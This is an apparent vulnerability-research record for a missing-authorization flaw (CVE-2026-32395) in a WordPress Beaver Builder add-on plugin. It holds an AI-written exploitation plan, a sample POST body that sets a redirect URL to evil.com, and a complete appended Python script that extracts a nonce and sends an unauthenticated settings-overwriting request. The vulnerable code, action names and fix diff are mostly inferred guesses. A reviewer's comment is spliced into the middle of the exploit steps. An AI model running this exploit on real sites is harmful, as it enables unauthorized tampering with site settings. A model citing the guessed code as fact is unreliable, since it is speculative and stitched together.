[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3y3d00BbA0Gcm1YEOkaZtaNWf9RavP_rJ0n6m-cm7Kg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32395","xpro-addons-for-beaver-builder-lite-missing-authorization","Xpro Addons For Beaver Builder – Lite \u003C= 1.5.6 - Missing Authorization","The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","xpro-addons-beaver-builder-elementor",null,"\u003C=1.5.6","1.5.7","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-20 00:00:00","2026-04-15 21:11:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cba908f-c7e3-4b4f-be73-8682fa1f231b?source=api-prod",55,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32395\n\n## 1. 
Vulnerability Summary\nThe **Xpro Addons For Beaver Builder – Lite** plugin (\u003C= 1.5.6) is vulnerable to **Missing Authorization**. The vulnerability exists because an AJAX handler registered via `wp_ajax_nopriv_` (unauthenticated) and `wp_ajax_` (authenticated) fails to perform a capability check (e.g., `current_user_can( 'manage_options' )`). This allows unauthenticated attackers to trigger sensitive plugin functions, likely related to settings modification or data handling.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `xpro_bb_lite_save_settings` (inferred based on plugin functionality and CVSS)\n- **Vulnerable Parameter:** `settings_data` or similar array-based input.\n- **Authentication:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active, and a valid nonce for the specific AJAX action must be obtained.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the AJAX action in the main plugin class or an AJAX handler class (likely `includes\u002Fclass-xpro-addons-beaver-builder-ajax.php` or `classes\u002Fclass-xpro-bb-lite-ajax.php`).\n    ```php\n    \u002F\u002F Inferred Registration\n    add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n    add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n    ```\n2.  **Handler Entry:** The `save_settings_callback` function is called when a request is made to `admin-ajax.php?action=xpro_bb_lite_save_settings`.\n3.  **Nonce Check:** The function likely calls `check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' )`.\n4.  **Missing Authorization:** The function **omits** a check like `if ( ! current_user_can( 'manage_options' ) ) wp_die();`.\n5.  **Sink:** The function proceeds to update plugin options using `update_option()`.\n\n## 4. 
Nonce Acquisition Strategy\nTo exploit `wp_ajax_nopriv` handlers, we must extract the nonce from the frontend where the plugin enqueues its scripts.\n\n1.  **Identify Shortcode:** The Xpro Addons scripts are typically loaded on pages containing an Xpro widget. We will use a common widget shortcode (e.g., `[xpro_contact_form]` or `[xpro_counter]`; both tags are inferred, confirm the real ones by grepping the plugin for `add_shortcode`).\n2.  **Create Trigger Page:** Create a public page containing the shortcode.\n    -   `wp post create --post_type=page --post_status=publish --post_title=\"Xpro Test\" --post_content='[xpro_counter]'`\n3.  **Localization Variable:** The plugin typically uses `wp_localize_script` to pass the nonce. Based on common Xpro naming conventions, look for:\n    -   JS Object: `xpro_bb_lite_vars` (inferred)\n    -   Nonce Key: `nonce` (inferred)\n4.  **Extraction Command:**\n    -   `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fxpro-test\")`\n    -   `browser_eval(\"window.xpro_bb_lite_vars?.nonce\")`\n\n## 5. Exploitation Strategy\nWe will attempt to modify a plugin setting (e.g., enabling a feature or changing a redirect URL) which demonstrates \"Integrity: Low\" impact.\n\n### HTTP Request (Playwright `http_request` tool)\n-   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **Method:** `POST`\n-   **Headers:**\n    -   `Content-Type: application\u002Fx-www-form-urlencoded`\n-   **Body** (the `settings_data[...]` array keys match the inferred `$_POST['settings_data']` read in the handler):\n    ```text\n    action=xpro_bb_lite_save_settings&nonce=[EXTRACTED_NONCE]&settings_data[some_critical_feature]=1&settings_data[redirect_url]=http:\u002F\u002Fevil.com\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `xpro-addons-beaver-builder-elementor` v1.5.6 is installed and active.\n2.  **Install Beaver Builder:** Ensure Beaver Builder (Lite or Pro) is active as Xpro is an addon for it.\n3.  **Create Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_content='[xpro_counter]'\n    ```\n\n## 7. 
Expected Results\n-   **Response Code:** `200 OK` (`wp_send_json_success()` does not set any other status; `admin-ajax.php` never returns `201`).\n-   **Response Body:** Likely a JSON success message: `{\"success\": true}` or `1`.\n-   **Effect:** The targeted plugin option is updated in the database.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the option has changed (option name inferred from the handler).\n    ```bash\n    wp option get xpro_bb_lite_settings --format=json\n    ```\n2.  **Verify Value:** Ensure the `some_critical_feature` or `redirect_url` key matches the payload value.\n\n## 9. Alternative Approaches\nIf `xpro_bb_lite_save_settings` is not the correct action:\n1.  **Search for other `nopriv` actions:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fxpro-addons-beaver-builder-elementor\u002F\n    ```\n2.  **Analyze found actions:** Look for any handler that calls `update_option`, `delete_option`, or `wp_insert_post` without a preceding `current_user_can()` check.\n3.  **Adjust Payload:** If the action relates to \"Contact Form\" data, try to trigger a data export or deletion (action name inferred):\n    -   Action: `xpro_bb_lite_export_form_data`\n    -   Payload: `action=xpro_bb_lite_export_form_data&nonce=[NONCE]&form_id=1`","The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized settings modification because it lacks capability checks on its AJAX handlers. 
This allows unauthenticated attackers to modify sensitive plugin configurations by sending crafted requests to the administrative AJAX endpoint.","\u002F\u002F Inferred registration of AJAX actions in the plugin's AJAX handler file\nadd_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\nadd_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n\n---\n\n\u002F\u002F Inferred vulnerable callback function likely in classes\u002Fclass-xpro-bb-lite-ajax.php\npublic function save_settings_callback() {\n    \u002F\u002F Nonce check may be present, but is insufficient for authorization\n    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );\n\n    \u002F\u002F Vulnerability: Missing check for current_user_can('manage_options')\n\n    if ( isset( $_POST['settings_data'] ) ) {\n        $settings = $_POST['settings_data'];\n        update_option( 'xpro_bb_lite_settings', $settings );\n    }\n    wp_send_json_success();\n}","--- a\u002Fclasses\u002Fclass-xpro-bb-lite-ajax.php\n+++ b\u002Fclasses\u002Fclass-xpro-bb-lite-ajax.php\n@@ -10,6 +10,10 @@\n \tpublic function save_settings_callback() {\n \t\tcheck_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( array( 'message' => 'Unauthorized access' ), 403 );\n+\t\t}\n+\n \t\tif ( isset( $_POST['settings_data'] ) ) {\n \t\t\t$settings = $_POST['settings_data'];\n \t\t\tupdate_option( 'xpro_bb_lite_settings', $settings );","1. Identify a public page on the target WordPress site that utilizes an Xpro Addon widget (this ensures the necessary scripts and nonces are enqueued).\n2. Extract the security nonce from the frontend source code, typically found within the 'xpro_bb_lite_vars' localized JavaScript object.\n3. Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'xpro_bb_lite_save_settings'.\n4. 
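Review bot: the inserted `current_user_can( 'manage_options' )` check fixes the authorization gap, but the unchanged lines after it still assign `$_POST['settings_data']` to `$settings` and hand it straight to `update_option( 'xpro_bb_lite_settings', $settings )` with no sanitization or key whitelist, so any caller who passes the check can persist arbitrary array values. Suggest validating per expected key before the `update_option()` call (for example `esc_url_raw()` for a redirect URL and `(bool)` casts for feature flags) and rejecting unknown keys. Note also that this hunk is an inferred reconstruction (the file is described as "likely" `classes/class-xpro-bb-lite-ajax.php`), not the vendor's 1.5.7 change; the real fix should be confirmed against the plugin's tags on plugins.trac.wordpress.org before it is cited as the patch.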
Include the extracted 'nonce' and a 'settings_data' array containing the desired configuration changes in the POST body.\n5. The server executes the update_option call without verifying if the user has administrative privileges, successfully overwriting the plugin settings.","gemini-3-flash-preview","2026-04-19 01:58:56","2026-04-19 01:59:18",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fxpro-addons-beaver-builder-elementor\u002Ftags"]
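The exploit outline above (find a page where the plugin localizes its script, pull the nonce out of the localized object, send an unauthenticated POST to `admin-ajax.php` with a PHP-style `settings_data[...]` array, and judge the response) as an added, stand-alone example; this is not code from the advisory page or from the plugin. The object name `xpro_bb_lite_vars`, the action `xpro_bb_lite_save_settings`, the `settings_data` field, the nonce value and the sample HTML are all assumptions carried over from the inferred plan, and the HTML is a constructed copy of what `wp_localize_script()` emits rather than a capture from a real site.

```python
import json
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample of the trigger page. wp_localize_script() emits
# `var NAME = {...};` with a JSON-encoded object, which is what we parse.
# Object name, keys and the nonce value are assumptions for this example.
SAMPLE_HTML = """<!doctype html><html><head>
<script type="text/javascript" id="xpro-bb-lite-js-extra">
/* <![CDATA[ */
var xpro_bb_lite_vars = {"ajax_url":"http:\\/\\/localhost:8080\\/wp-admin\\/admin-ajax.php","nonce":"3f9c1a7b2e"};
/* ]]> */
</script>
</head><body><div class="xpro-counter">42</div></body></html>"""


def extract_localized_object(html, var_name):
    """Return the object wp_localize_script() assigned to var_name.

    The value is JSON (wp_localize_script() runs wp_json_encode()), so the
    first `{...};` after `var <name> =` is loaded with json.loads(), which
    also undoes the `\\/` slash escaping WordPress adds.
    """
    pattern = re.compile(r"var\s+" + re.escape(var_name) + r"\s*=\s*(\{.*?\});", re.S)
    match = pattern.search(html)
    if not match:
        raise ValueError(f"{var_name} not found in page")
    return json.loads(match.group(1))


def extract_nonce(html, var_name="xpro_bb_lite_vars", key="nonce"):
    """Step 2 of the outline: the nonce lives in the localized object."""
    obj = extract_localized_object(html, var_name)
    if key not in obj:
        raise ValueError(f"{var_name} has no '{key}' key")
    return obj[key]


def build_ajax_body(action, nonce, settings, field="settings_data"):
    """Steps 3 and 4: build the urlencoded POST body.

    PHP turns `field[key]=value` pairs into an array, which is what the
    inferred handler reads from $_POST['settings_data'].
    """
    params = [("action", action), ("nonce", nonce)]
    params.extend((f"{field}[{k}]", str(v)) for k, v in settings.items())
    return urllib.parse.urlencode(params)


def send_ajax(ajax_url, body, timeout=10.0):
    """POST with no cookies, i.e. as an unauthenticated visitor.

    Returns (status, parsed JSON or None). Network call; only used from main.
    """
    req = urllib.request.Request(
        ajax_url,
        data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            raw, status = resp.read().decode(errors="replace"), resp.status
    except urllib.error.HTTPError as err:
        raw, status = err.read().decode(errors="replace"), err.code
    try:
        return status, json.loads(raw)
    except json.JSONDecodeError:
        return status, None


def interpret_response(status, body):
    """Map the admin-ajax reply onto the plan's expected results.

    wp_send_json_success() answers 200 with {"success": true}; a handler
    that gained a capability check answers 403 / {"success": false}.
    """
    if isinstance(body, dict) and body.get("success") is True:
        return "updated"
    if status == 403 or (isinstance(body, dict) and body.get("success") is False):
        return "rejected"
    return "unexpected"


if __name__ == "__main__":
    # With no argument, run against the constructed page only (offline).
    # With a URL argument, fetch that trigger page and send the request.
    html = SAMPLE_HTML
    if len(sys.argv) > 1:
        with urllib.request.urlopen(sys.argv[1], timeout=10) as page:
            html = page.read().decode(errors="replace")
    localized = extract_localized_object(html, "xpro_bb_lite_vars")
    body = build_ajax_body("xpro_bb_lite_save_settings", localized["nonce"],
                           {"redirect_url": "http://example.invalid/"})
    print(body)
    if len(sys.argv) > 1:
        status, reply = send_ajax(localized["ajax_url"], body)
        print(status, reply, interpret_response(status, reply))
```

Run it with no arguments to see the body it would send; with a URL it fetches the page, so only point it at a lab instance you own. The nonce is tied to the visitor's session cookie and to the action name, so the page fetch and the POST must be made with the same (empty) cookie jar, which is why both use plain `urllib` with no cookies here.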